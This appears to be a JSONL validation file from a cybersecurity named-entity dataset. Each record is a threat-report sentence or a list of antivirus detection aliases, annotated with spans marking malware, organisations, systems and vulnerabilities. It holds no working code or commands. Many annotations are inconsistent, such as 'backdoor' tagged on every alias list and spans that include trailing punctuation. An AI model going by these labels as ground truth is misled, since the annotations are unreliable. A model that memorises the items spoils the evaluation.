{"text": "A backdoor also known as: Troj.Sms.Androidos!c Android.Trojan.Moavt.C ZIP/Trojan.AQYD-7 Android.Trojan.Moavt.C A.L.Rog.EvilCert.AAU Android.BackDoor.198 Android.Trojan.Moavt.C Android-PUP/Malct.46b11", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000300", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojandownloader.Muntsib Win32.Trojan.WisdomEyes.16070401.9500.9796 TROJ_DLOADR.PTJ Trojan.DownLoader8.62204 Trojan/Swisyn.abf TR/Samca.rxobe Trojan/Win32.Unknown Win32.Troj.Undef.kcloud TrojanDownloader:Win32/Muntsib.A Trojan.DL.Muntsib!XmhOhF4BghY Trojan.Win32.Swisyn", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000301", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan-PWS/W32.WebGame.15651 Trojan.Onlinegames PWS-OnlineGames.s Win32.Trojan.WisdomEyes.16070401.9500.9986 Infostealer.Gampass TROJ_GAMETHI.GDH Trojan.Win32.OnLineGames.bqyohw Trojan.Win32.Z.Onlinegames.15651 Troj.GameThief.W32.OnLineGames.uwrk!c TrojWare.Win32.Trojan.Inject.~II Trojan.PWS.Gamania.40251 Trojan.OnLineGames.Win32.20752 TROJ_GAMETHI.GDH PWS-OnlineGames.s Trojan/GamePass.aa Trojan[GameThief]/Win32.WOW.gic Win32.Troj.OnlineGameT.kcloud PWS:Win32/Yokoyou.A Trojan/Win32.OnlineGameHack.C66956 Win32.Trojan.Spy.Anpm Trojan-Downloader.Win32.Delf", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000302", "source": "cyner2_valid"}}
{"text": "Stage 3 : Installer that takes DLL side-loading to a new level Stage 3 represents the setup program for FinFisher .", "spans": {"Malware: FinFisher": [[104, 113]]}, "info": {"id": "cyner2_valid_000303", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: W32.TikoraxaDSB.Trojan Trojan.Script Win32.Trojan.WisdomEyes.16070401.9500.9718 W32/Snojan.S Trojan.Win32.VB.euvttr BehavesLike.Win32.Dropper.dh Trojan-Downloader.VBS.Small Trojan.HGRA-31 Trojan.Pincav.aer TR/VB.Small.jktqo TrojanDownloader:VBS/Sminager.I Trojan/Win32.CoinMiner.C2256512 Trojan.Snojan Trj/CI.A VBS/TrojanDownloader.Small.NGO Trojan.DL.Alien! Win32/Trojan.0b6", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000305", "source": "cyner2_valid"}}
{"text": "July 16 On the mobile front , a fake news app designed to bypass Google Play was discovered .", "spans": {"System: Google Play": [[65, 76]]}, "info": {"id": "cyner2_valid_000306", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9998 RTKT_KTDOOR.SMIA Trojan-Downloader.Win32.RtkDL.jtp Trojan.Win32.RtkDL.cwnuqz Trojan.Win32.A.Downloader.24832.B Trojan.DownLoad1.36015 RTKT_KTDOOR.SMIA Trojan.Rootkit Rootkit.Vanti.ehn Trojan[Downloader]/Win32.RtkDL Trojan-Downloader.Win32.RtkDL.jtp W32/Koutodoor.A!tr.rkit", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000307", "source": "cyner2_valid"}}
{"text": "Let ’ s take an in-depth look at Asacub 5.0.3 , the most widespread version in 2018 .", "spans": {"Malware: Asacub": [[33, 39]]}, "info": {"id": "cyner2_valid_000308", "source": "cyner2_valid"}}
{"text": "Take for instance the fileless, code-injecting ransomware we've uncovered—SOREBRECT, which Trend Micro detects as RANSOM_SOREBRECT.A and RANSOM_SOREBRECT.B.", "spans": {"Malware: fileless, code-injecting ransomware": [[22, 57]], "Malware: uncovered—SOREBRECT,": [[64, 84]], "Organization: Trend Micro": [[91, 102]]}, "info": {"id": "cyner2_valid_000309", "source": "cyner2_valid"}}
{"text": "On the other hand , dynamic analysis tools ( like debuggers or sandbox ) face the anti-debug and anti-analysis tricks hidden in the virtualized code itself that detects sandbox environments and alters the behavior of the malware .", "spans": {}, "info": {"id": "cyner2_valid_000310", "source": "cyner2_valid"}}
{"text": "Figure 14 : Information theft via fake credit card verification using stolen branding Figure 15 : Information theft via fake credit card verification using stolen branding Some of the campaigns appear to have a wider reach based on bit.ly statistics like this one from October 13 , 2017 : Figure 16 : bit.ly statistics for an October 13 , 2017 campaign Over several days during the last three months , Proofpoint researchers observed campaigns using similar techniques targeting the banking customers of Raffeisen and Sparkasse .", "spans": {"Organization: Proofpoint": [[402, 412]]}, "info": {"id": "cyner2_valid_000311", "source": "cyner2_valid"}}
{"text": "WolfRAT is a specifically targeted RAT which we assess to be aimed at Thai individuals and , based on previous work from Wolf Research , most likely used as an intelligence-gathering tool or interception tool .", "spans": {"Malware: WolfRAT": [[0, 7]], "Organization: Wolf Research ,": [[121, 136]]}, "info": {"id": "cyner2_valid_000312", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.MSILPerseus.DE36 Win32.Trojan.WisdomEyes.16070401.9500.9995 TR/Dldr.Banload.xacls TrojanDownloader:MSIL/Aguadi.A Trojan-Downloader.MSIL.Banload MSIL/Banload.CP!tr.dldr", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000313", "source": "cyner2_valid"}}
{"text": "Organizations who provide support services to these industries are also of interest.", "spans": {"Organization: Organizations": [[0, 13]], "Organization: industries": [[52, 62]]}, "info": {"id": "cyner2_valid_000314", "source": "cyner2_valid"}}
{"text": "In the subsequent sections, we'll detail the various stages of the TeslaCrypt 4.1A attack chain, moving from infiltration to detection evasion, anti-analysis and evasion features, entrenchment, and the malicious mission, concluding with some points on the user experience.", "spans": {"Malware: TeslaCrypt 4.1A": [[67, 82]], "System: user experience.": [[256, 272]]}, "info": {"id": "cyner2_valid_000315", "source": "cyner2_valid"}}
{"text": "Although multi-step overlays are not something new , their usage is generally limited to avoid raising suspicion .", "spans": {}, "info": {"id": "cyner2_valid_000316", "source": "cyner2_valid"}}
{"text": "List of C2s used by Buhtrap", "spans": {"Malware: Buhtrap": [[20, 27]]}, "info": {"id": "cyner2_valid_000317", "source": "cyner2_valid"}}
{"text": "Then the malware leaves a positive review and a high rating on Google Play using content it receives from the C & C server .", "spans": {"System: Google Play": [[63, 74]]}, "info": {"id": "cyner2_valid_000318", "source": "cyner2_valid"}}
{"text": "Remote Administration Tools RAT have been around for a long time.", "spans": {"Malware: Remote Administration Tools RAT": [[0, 31]]}, "info": {"id": "cyner2_valid_000319", "source": "cyner2_valid"}}
{"text": "Allows an application to write SMS messages .", "spans": {}, "info": {"id": "cyner2_valid_000320", "source": "cyner2_valid"}}
{"text": "Since then, we have continued our research into the Command and Control C2 infrastructure associated with KASPERAGENT and MICROPSIA.", "spans": {"Malware: KASPERAGENT": [[106, 117]], "Malware: MICROPSIA.": [[122, 132]]}, "info": {"id": "cyner2_valid_000321", "source": "cyner2_valid"}}
{"text": "The Snake Wine group has proven to be highly adaptable and has continued to adopt new tactics in order to establish footholds inside victim environments.", "spans": {}, "info": {"id": "cyner2_valid_000323", "source": "cyner2_valid"}}
{"text": "IT people are known for having more access and permissions inside their organizations than other employees, mainly because they need to manage and operate the infrastructure.", "spans": {"Organization: IT people": [[0, 9]], "Organization: organizations": [[72, 85]], "System: the infrastructure.": [[155, 174]]}, "info": {"id": "cyner2_valid_000324", "source": "cyner2_valid"}}
{"text": "After installation , the user needs to run the application .", "spans": {}, "info": {"id": "cyner2_valid_000325", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9999 Backdoor.Win32.Androm.outd Trojan.DownLoader9.21403 BehavesLike.Win32.Trojan.ct Trojan:Win32/Redyms.A Backdoor.Win32.Androm.outd Trojan.Kryptik!Tb6rnBsmOnc Trojan.Win32.Redyms W32/Kryptik.BAAC!tr", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000327", "source": "cyner2_valid"}}
{"text": "This article is on a new strain', it dates to March this year from what I can tell.", "spans": {"Malware: new strain',": [[21, 33]]}, "info": {"id": "cyner2_valid_000328", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan/Llac.adnr Win32.Trojan.WisdomEyes.16070401.9500.9995 Trojan.Win32.Llac.uvopl Worm.Win32.Injector.BA BackDoor.Cybergate.1 BehavesLike.Win32.PWSZbot.cc Trojan/Llac.fff Trojan/Win32.Llac Trojan.Graftor.D5D002 Trojan:Win32/Anaki.A!gfc Virus.Win32.Heur Win32/Trojan.a87", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000329", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.Winnti Trojan/Rootkitdrv.a Win32.Trojan.WisdomEyes.16070401.9500.9997 W32/Trojan.ENJV-1442 Backdoor.Winnti Backdoor.Win32.S.Winnti.270336 Trojan.DownLoader5.54034 Trojan.Rootkitdrv.Win32.23 BehavesLike.Win32.VTFlooder.dc Trojan[Backdoor]/Win32.Winnti Win32.Hack.Winnti.kcloud Trojan.Zusy.D3BD7 Trojan:Win64/Winnti.A Win-Trojan/Backdoor.270336.C W32/Winnti.AI!tr.bdr", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000330", "source": "cyner2_valid"}}
{"text": "Dell SecureWorks Counter Threat UnitTM CTU researchers investigated activities associated with Threat Group-3390 TG-3390.", "spans": {"Organization: Dell SecureWorks Counter Threat UnitTM CTU researchers": [[0, 54]]}, "info": {"id": "cyner2_valid_000331", "source": "cyner2_valid"}}
{"text": "Cobalt Strike has been their primary toolset for command and control within the victim networks, while BeEF has been used to assist in the initial infection process.", "spans": {"Malware: Cobalt Strike": [[0, 13]], "Malware: toolset": [[37, 44]], "System: networks,": [[87, 96]], "Malware: BeEF": [[103, 107]]}, "info": {"id": "cyner2_valid_000333", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.Symmi.110 Win32.Trojan.WisdomEyes.16070401.9500.9974 Trojan.Win32.Scar.fzmk Heur.Packed.Unknown Trojan:W32/Kamala.A BehavesLike.Win32.Ransom.lc TrojanDownloader:Win32/Scar.D Trojan.Win32.Scar.fzmk Trojan.Scar Trj/CI.A Virus.Win32.Virut.tu Trojan.DL.Delf!Rolvsy/8gQo Trojan.Win32.Scar W32/Delf.QTN!tr Win32/Trojan.e4a", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000334", "source": "cyner2_valid"}}
{"text": "\" Users must realize that they can no longer trust in installing only apps with a high reputation from official app stores as their sole defense , '' the researchers wrote in an e-mail to Ars .", "spans": {"Organization: Ars": [[188, 191]]}, "info": {"id": "cyner2_valid_000335", "source": "cyner2_valid"}}
{"text": "Disguised as Google related app , the core part of malware exploits various known Android vulnerabilities and automatically replaces installed apps on the device with malicious versions without the user ’ s interaction .", "spans": {"Organization: Google": [[13, 19]], "Vulnerability: Android vulnerabilities": [[82, 105]]}, "info": {"id": "cyner2_valid_000336", "source": "cyner2_valid"}}
{"text": "These repackaged apps are peddled to unsuspecting users, mostly through third-party app stores.", "spans": {"Organization: users,": [[50, 56]], "System: third-party app stores.": [[72, 95]]}, "info": {"id": "cyner2_valid_000337", "source": "cyner2_valid"}}
{"text": "Currently, it is designed to collect data from PoS systems running on Oracle® MICROS®, a platform popularly used in the hospitality, food and beverage, and retail industries.", "spans": {"System: PoS systems": [[47, 58]], "System: Oracle® MICROS®,": [[70, 86]], "System: platform": [[89, 97]], "Organization: hospitality, food": [[120, 137]], "Organization: beverage,": [[142, 151]], "Organization: retail industries.": [[156, 174]]}, "info": {"id": "cyner2_valid_000338", "source": "cyner2_valid"}}
{"text": "First , they use the built-in toolbox commands to determine what apps are running .", "spans": {}, "info": {"id": "cyner2_valid_000339", "source": "cyner2_valid"}}
{"text": "Installation process with administrative privilege This installation method is more interesting because it reveals how the malware tries to achieve stealthier persistence on the machine .", "spans": {}, "info": {"id": "cyner2_valid_000340", "source": "cyner2_valid"}}
{"text": "The custom malware was submitted by a user in Bangladesh, and contains sophisticated functionality for interacting with local SWIFT Alliance Access software running in the victim infrastructure.", "spans": {"Malware: custom malware": [[4, 18]], "Organization: user": [[38, 42]], "System: SWIFT Alliance Access software": [[126, 156]], "System: victim infrastructure.": [[172, 194]]}, "info": {"id": "cyner2_valid_000341", "source": "cyner2_valid"}}
{"text": "Given that there are a limited number of behaviors required to identify billing fraud , Bread apps have had to try a wide variety of techniques to mask usage of these APIs .", "spans": {"Malware: Bread": [[88, 93]]}, "info": {"id": "cyner2_valid_000343", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9998 Trojan.Starter.4385 Trojan.Zusy.D21C07 Backdoor:MSIL/Torwofun.B Trj/CI.A MSIL/Starter.AH!tr Win32/Trojan.aa2", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000344", "source": "cyner2_valid"}}
{"text": "The Sednit group—variously also known as APT28, Fancy Bear, Sofacy, Pawn Storm, STRONTIUM and Tsar Team—is a group of attackers operating since 2004 if not earlier, whose main objective is to steal confidential information from specific targets.", "spans": {"Organization: specific targets.": [[228, 245]]}, "info": {"id": "cyner2_valid_000345", "source": "cyner2_valid"}}
{"text": "Spread command from C2 The victim receives the command sendSMSMass .", "spans": {}, "info": {"id": "cyner2_valid_000346", "source": "cyner2_valid"}}
{"text": "Spammers are always evolving to get their messages to the end users by bypassing SPAM filters while still appearing convincing enough to get a user to complete the actions required to infect the system.", "spans": {"System: SPAM filters": [[81, 93]], "System: system.": [[195, 202]]}, "info": {"id": "cyner2_valid_000347", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: W32.Sality.PE Win32.Sality.3 W32.Sality.U Win32.Sality.3 PE_SALITY.ER W32.Sality.AE Win32/Sality.AA PE_SALITY.ER Win32.Sality.3 Virus.Win32.Sality.bzkem Win32.Sality.3 Win32.Sector.30 Virus.Sality.Win32.25 BehavesLike.Win32.Sality.fh Virus.Win32.Sality Win32/HLLP.Kuku.poly2 W32/Sality.AT Win32.Sality.lx.368640 HackTool:Win32/SanmaoSMTPMailCracker.A Win32.Sality.3 Win32/Kashu.E Win32.Sality.3 Virus.Win32.Sality.bakb Win32.Sality Win32/Sality.NBA W32/Sality.AA Virus.Win32.Sality.I", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000348", "source": "cyner2_valid"}}
{"text": "In fact, we think that the BlackEnergy group has evolved into the TeleBots group.", "spans": {}, "info": {"id": "cyner2_valid_000349", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Win32.Wuke.B Trojan.Wuke W32/Wuke.sys Dropper.Delf.Win32.5098 Troj.Dropper.W32.Delf.lqr!c RTKT_WUKE.AH Win32.Trojan.WisdomEyes.16070401.9500.9814 RTKT_WUKE.AH Win32.Wuke.B Win32.Wuke.B Win32.Wuke.B Win32.Wuke.B Win32.HLLW.Wuke Trojan.5 W32/Wuke.sys Trojan.Win32.Rootkit Backdoor/HookSSDT.ai Trojan[Dropper]/Win32.Delf Win32.Troj.Rootkit.kd.kcloud Trojan:Win32/Wuke.A!sys Win32/Runepo.E Win32.Wuke.B Trojan.5 Win32.Wuke.B Win32.Trojan.Wuke.Hprx Trojan.Wuke!7bT8/QLS+As W32/Wuke.AE!tr Win32/Trojan.Rootkit.5d4", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000350", "source": "cyner2_valid"}}
{"text": "This may indicate that valid, administrative level credentials were used against the host.", "spans": {"Organization: host.": [[85, 90]]}, "info": {"id": "cyner2_valid_000351", "source": "cyner2_valid"}}
{"text": "We started with most frequently used C & C domains “ a * * * d.com ” , “ a * * * d.net ” , and “ a * * * d.org ” .", "spans": {}, "info": {"id": "cyner2_valid_000352", "source": "cyner2_valid"}}
{"text": "In the case of Android devices , accessing the malicious website or pressing any of the buttons will prompt the download of the APK .", "spans": {"System: Android": [[15, 22]]}, "info": {"id": "cyner2_valid_000353", "source": "cyner2_valid"}}
{"text": "Don ’ t install apps outside the official app store .", "spans": {}, "info": {"id": "cyner2_valid_000354", "source": "cyner2_valid"}}
{"text": "Currently , such Trojans attack a limited number of bank customers , but it is expected that cybercriminals will invent new techniques that will allow them to expand the number and the geography of potential victims .", "spans": {}, "info": {"id": "cyner2_valid_000355", "source": "cyner2_valid"}}
{"text": "The following screenshots show what type of information is collected in both steps of the overlay attack : Ginp overlaysGinp overlaysGinp overlaysGinp overlays Based on Anubis Once the Anubis bot code got leaked , it was just a matter of time before new banking Trojans based on Anubis would surface .", "spans": {"Malware: Ginp": [[107, 111]], "Malware: Anubis": [[169, 175], [185, 191], [279, 285]]}, "info": {"id": "cyner2_valid_000356", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.Multi TROJ_FMIC.NIL Win32.Trojan.WisdomEyes.16070401.9500.9969 Backdoor.Trojan.B TROJ_FMIC.NIL Uds.Dangerousobject.Multi!c Trojan.Win32.Webprefix", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000357", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan/W32.Barok.1060921 Trojan-PSW.Win32.Barok.20 Trojan.Win32.Barok.dcuq Trojan.LoveLetter Trojan.Barok.Win32.18 Trojan/PSW.Barok.20 TR/Barok.PSW.10 Trojan-PSW.Win32.Barok.20 Trojan.PWS.Barok!R90hGVGYM8Y HEUR/QVM02.0.DAC3.Trojan-PSW.Win32.Barok", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000358", "source": "cyner2_valid"}}
{"text": "Then, at some point, the information leaks out and cybercrime groups start using it more widely.", "spans": {}, "info": {"id": "cyner2_valid_000359", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Backdoor.Skubur.2.6 Backdoor/W32.Skubur.77824 Backdoor/Skubur.f W32/Risk.XSZR-8781 Backdoor.Trojan Win32/Skubur.F BKDR_SKUBUR.F Win.Trojan.Skubur-2 Backdoor.Skubur.2.6 Backdoor.Win32.Skubur.h Backdoor.Skubur.2.6 Trojan.Win32.Skubur.dnke Backdoor.W32.Skubur.h!c Win32.Backdoor.Skubur.Aglc Backdoor.Skubur.2.6 Backdoor.Win32.Skubur.F Backdoor.Skubur.2.6 Trojan.DownLoader8.54017 Backdoor.Skubur.Win32.5 Backdoor/Skubur.f Adware:Win32/DeBurrower.B BDS/Skubur.f Trojan[Backdoor]/Win32.Skubur Backdoor.Skubur.2.6 Backdoor.Win32.Skubur.h Backdoor:Win32/Skubur.F Trojan/Win32.HDC.C920 Backdoor.Skubur.2.6 Backdoor.Skubur Backdoor.Win32.Skubur.f W32/Skubur.F!tr.bdr Win32/Backdoor.216", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000360", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.Padueta TSPY_PADU.SM Trojan.Awax TSPY_PADU.SM Trojan.Win32.Z.Small.10752.GG Trojan.MulDrop7.44616 W32/Trojan.CYEU-5546 TR/Small.pjrjp Trojan:MSIL/Padueta.A Trj/GdSda.A Trojan.MSIL.Small MSIL/Small.AF!tr Win32/Trojan.4b2", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000361", "source": "cyner2_valid"}}
{"text": "The phishing emails and document files leveraged a variety of geopolitically sensitive subject matters as attractive lures, such as events in Beijing, the Dalai Lama, North Korea relations, the Zika virus, and various legitimate appearing announcements.", "spans": {"Organization: the Dalai Lama,": [[151, 166]]}, "info": {"id": "cyner2_valid_000362", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: HW32.Packed.A52C Trojan/W32.Stuh.67584.E Trojan/BHO.qkd Win32.Trojan.WisdomEyes.16070401.9500.9991 Win32/Vundo.CQO TROJ_VUNDO.SMZ Win.Trojan.Stuh-774 Packed.Win32.Krap.p Trojan.Win32.Stuh.67584.I ApplicUnsaf.Win32.Adware.SuperJuan.~H Trojan.Virtumod.based.25 Trojan.BHO.Win32.3425 TROJ_VUNDO.SMZ BehavesLike.Win32.Worm.kc Packer.Win32.Krap Trojan/Vundo.cby Trojan[Packed]/Win32.Krap Win32.Troj.PackerUndefT.eh.67650 Trojan.Krypt.12 Packed.Win32.Krap.p BScope.Trojan.Stuh.2 Trj/Zlob.MD", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000363", "source": "cyner2_valid"}}
{"text": "Google Play has removed the apps and they stated that \" thanks to enhanced detection models , Google Play Protect will now be able to better detect future variants of these applications '' .", "spans": {"System: Google Play": [[0, 11]], "System: Google Play Protect": [[94, 113]]}, "info": {"id": "cyner2_valid_000365", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Riskware.Win32.ELEX.eskxqv Trojan.StartPage1.45115 Trojan.Inject.Win32.182207 BehavesLike.Win32.BadFile.tm PUP.Elex/Variant", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000367", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Worm.Stuxnet.B4 W32/Stuxnet.n Trojan.Win32.Stuxnet.bnpqw RTKT_STUXNET.A Trojan.Stuxnet-9 Worm.Win32.Stuxnet.n Worm.Stuxnet!+pknika2LS4 Worm.Win32.A.Stuxnet.1286144[h] Worm.Win32.Stuxnet.K Trojan.Stuxnet.1 Worm.Stuxnet.Win32.44 RTKT_STUXNET.A BehavesLike.Win32.PWSOnlineGames.th TrojanDropper.Stuxnet.e WORM/Stuxnet.A.7 W32/Stuxnet.N!worm Worm/Win32.Stuxnet W32.W.Stuxnet.n!c Worm/Win32.Stuxnet Worm:Win32/Stuxnet.A Win32/Stuxnet.A SScope.Trojan-Spy.0485 Trj/CI.A Win32.Worm.Stuxnet.Ajbz Trojan.Win32.Stuxnet Worm.Win32.Stuxnet.n", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000368", "source": "cyner2_valid"}}
{"text": "The malware cleans the system event logs using OpenEventLog/ClearEventLog APIs , and then terminates the setup procedure with a call to StartService to run the stage 4 malware .", "spans": {}, "info": {"id": "cyner2_valid_000369", "source": "cyner2_valid"}}
{"text": "A new crypto-ransomware variant dubbed Petya detected by Trend Micro as RANSOM_PETYA.A.", "spans": {"Malware: crypto-ransomware variant": [[6, 31]], "Malware: Petya": [[39, 44]], "Organization: Trend Micro": [[57, 68]]}, "info": {"id": "cyner2_valid_000370", "source": "cyner2_valid"}}
{"text": "Some indicators may come in the form of peculiar behavior such as unexpected rebooting , finding unfamiliar apps installed , or instant messaging apps suddenly freezing .", "spans": {}, "info": {"id": "cyner2_valid_000371", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan-Spy.Win32.Snifie.pff Trojan.Win32.Banker2.bjswk Trojan.DownLoader1.7798 Trojan.Banker.Win32.116680 BehavesLike.Win32.Virut.fc TrojanSpy.Snifie.m Trojan[Spy]/Win32.Snifie PWS:Win32/Verweli.A Trojan.Heur.ui0fr4pdzIjO Trojan-Spy.Win32.Snifie.pff TScope.Trojan.Delf Trj/Banker.MEK", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000372", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.Wingbird Win32.Trojan.WisdomEyes.16070401.9500.9999 W32/Trojan.TURR-0822 TR/Crypt.ZPACK.pgagz Trojan:Win32/Wingbird.C!dha Trj/GdSda.A Trojan.Win32.Wingbird Win32/Trojan.d3a", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000373", "source": "cyner2_valid"}}
{"text": "A few days before the publishing of this blog post I came across an unknown RTF exploit sample which I could not identify as being an exploit targeting a known vulnerability like CVE-2012-0158 or CVE-2014-1761.", "spans": {"Malware: unknown RTF exploit": [[68, 87]], "Malware: exploit": [[134, 141]], "Vulnerability: vulnerability": [[160, 173]]}, "info": {"id": "cyner2_valid_000374", "source": "cyner2_valid"}}
{"text": "The submission in this case was an email attachment, Free_Hosting.doc, a Rich Text Format RTF document that attempts to exploit CVE-2015-1641.", "spans": {"Vulnerability: exploit": [[120, 127]]}, "info": {"id": "cyner2_valid_000375", "source": "cyner2_valid"}}
{"text": "This ongoing campaign appears to target primarily state and local government agencies and educational institutions in the United States.", "spans": {"Organization: state": [[50, 55]], "Organization: local government agencies": [[60, 85]], "Organization: educational institutions": [[90, 114]]}, "info": {"id": "cyner2_valid_000376", "source": "cyner2_valid"}}
{"text": "Today, Proofpoint researchers observed the document exploit being used in a large email campaign distributing the Dridex banking Trojan.", "spans": {"Organization: Proofpoint researchers": [[7, 29]], "Malware: Dridex banking Trojan.": [[114, 136]]}, "info": {"id": "cyner2_valid_000377", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Spyware.OnlineGames Trojan-Downloader.Win32.Banload.aavkj Win32.Trojan.Spy.Agky Worm.Win32.Dropper.RA Trojan:W32/DelfInject.R TrojanDownloader:Win32/Asnep.A Trojan-Downloader.Win32.Banload.aavkj Trojan.Antavmu", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000379", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9988 Win.Trojan.Merong-1 Trojan.Win32.Crypted.crabdz Trojan.DownLoader8.6826 Virus.Win32.Malware Trojan/Win32.Unknown Trojan:Win32/Godin.A Trojan/Win32.Scar.R81257 Trojan.Downloader W32/Downloader_a.SU!tr Win32/Trojan.cb1", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000380", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan-Dropper.Win32.NSIS!O Trojan.Win32.Goriadu.wqbho Trojan.Bohu TROJ_GORIADU.SMX Trojan-Dropper.Win32.NSIS.vh Trojan.Goriadu TROJ_GORIADU.SMX RiskWare[RiskTool:not-a-virus]/Win32.DllChander TrojanDropper:Win32/Bohu.B Trojan.Ferz.xl PE:Trojan.Win32.AntiCloudAV.l!1075334204", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000381", "source": "cyner2_valid"}}
{"text": "After the encryption of the files, a ransom note appears, demanding a payment in Bitcoins to retrieve the files.", "spans": {}, "info": {"id": "cyner2_valid_000383", "source": "cyner2_valid"}}
{"text": "During this stage of the activation cycle , the malware increases the beaconing time to avoid detection .", "spans": {}, "info": {"id": "cyner2_valid_000384", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.Spambot.BXB Trojan.Spambot.BXB TROJ_SPAMBOT.B Win32.Trojan.WisdomEyes.16070401.9500.9785 W32/Backdoor.AJPB Trojan.SpamThru TROJ_SPAMBOT.B Win.Trojan.Spambot-279 Trojan.Spambot.BXB Trojan.Spambot.BXB Trojan.Spambot.BXB Trojan.Qhost.45065 Backdoor.Win32.09A427D4 BehavesLike.Win32.VTFlooder.cc W32/Backdoor.AJPB TR/SpamBot.bxc Trojan.Downloader-MSDCom32 Trojan/Win32.Qhost.R2082 Trojan.Spambot.BXB Trj/Qhost.HX", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000386", "source": "cyner2_valid"}}
{"text": "Based on our research and Benoît Ancel 's tracker , this C2 was used by Wolf Intelligence : Additionally , we identified two empty panels on a C2 server .", "spans": {"Organization: Wolf Intelligence": [[72, 89]]}, "info": {"id": "cyner2_valid_000387", "source": "cyner2_valid"}}
{"text": "In addition to the P5+1 events, the Duqu 2.0 group has launched a similar attack in relation to the 70th anniversary event of the liberation of Auschwitz-Birkenau.", "spans": {"Malware: Duqu 2.0": [[36, 44]], "Organization: liberation of Auschwitz-Birkenau.": [[130, 163]]}, "info": {"id": "cyner2_valid_000388", "source": "cyner2_valid"}}
{"text": "While RETADUP was found in Israeli hospitals, a new variant was targeting specific industries and governments in South America.", "spans": {"Malware: RETADUP": [[6, 13]], "Organization: Israeli hospitals,": [[27, 45]], "Malware: a new variant": [[46, 59]], "Organization: industries": [[83, 93]], "Organization: governments": [[98, 109]]}, "info": {"id": "cyner2_valid_000391", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: W32.Kernel32ZX1.Trojan Backdoor.CPEX.Win32.25503 Win32.Trojan.WisdomEyes.16070401.9500.9992 W32/Pws.BUZT Downloader.Bancos Win.Trojan.Wow-1528 Troj.GameThief.W32.WOW.dze!c Packed.Win32.Klone.~KMG Trojan.PWS.Gamania.17290 BehavesLike.Win32.Backdoor.mc Trojan-Downloader.Malwar TR/Dldr.Malwar.C Backdoor:Win32/Spamchn.A Trojan/Win32.OnlineGameHack.R36603 TScope.Trojan.Delf Win32/Delf.NRX", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000392", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.Remotemanipulator RiskWare.RemoteAdmin.RMNS not-a-virus:RemoteAdmin.Win32.RemoteManipulator.mz Trojan.Win32.Mlw.euxnyl Trojan.Win32.Z.Teamspy.2479616 BehavesLike.Win32.Dropper.vc TrojanDropper:Win32/Teamspy.A!bit not-a-virus:RemoteAdmin.Win32.RemoteManipulator.mz Trj/CI.A Win32/Virus.RemoteAdmin.745", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000393", "source": "cyner2_valid"}}
{"text": "As with most Android ransomware , this new threat doesn ’ t actually block access to files by encrypting them .", "spans": {"System: Android": [[13, 20]]}, "info": {"id": "cyner2_valid_000394", "source": "cyner2_valid"}}
